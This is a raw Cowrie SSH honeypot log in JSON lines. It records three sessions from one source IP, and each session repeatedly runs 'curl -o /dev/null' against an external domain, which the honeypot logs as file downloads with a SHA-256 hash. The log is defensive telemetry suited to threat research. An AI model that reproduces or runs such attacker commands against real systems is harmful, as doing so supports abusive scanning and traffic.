{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.711454Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.712051Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.715636Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.716861Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.717533Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.742336Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.742999Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.747598Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.749211Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.750640Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.752186Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.753885Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.754637Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.812301Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.812993Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.815031Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.815662Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.823584Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.826525Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.847798Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.848588Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.852553Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.854132Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.854805Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.858558Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.859215Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.862304Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.864518Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.867871Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.890747Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.891421Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.894417Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.895016Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.897995Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.901296Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.903139Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.903749Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.929028Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.929662Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.931745Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.932494Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.934783Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.936676Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.944544Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.945518Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.945943Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.970187Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.970881Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.973737Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.974366Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.978447Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.981676Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.983548Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.985780Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.986836Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.016036Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.016837Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.022079Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.024280Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.028425Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.029023Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.034347Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.052800Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.053564Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.059863Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.061612Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.064030Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.066947Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.067916Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.086608Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.087289Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.092594Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.094501Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.097456Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.098491Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.117417Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.120082Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.123963Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.124682Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.128705Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
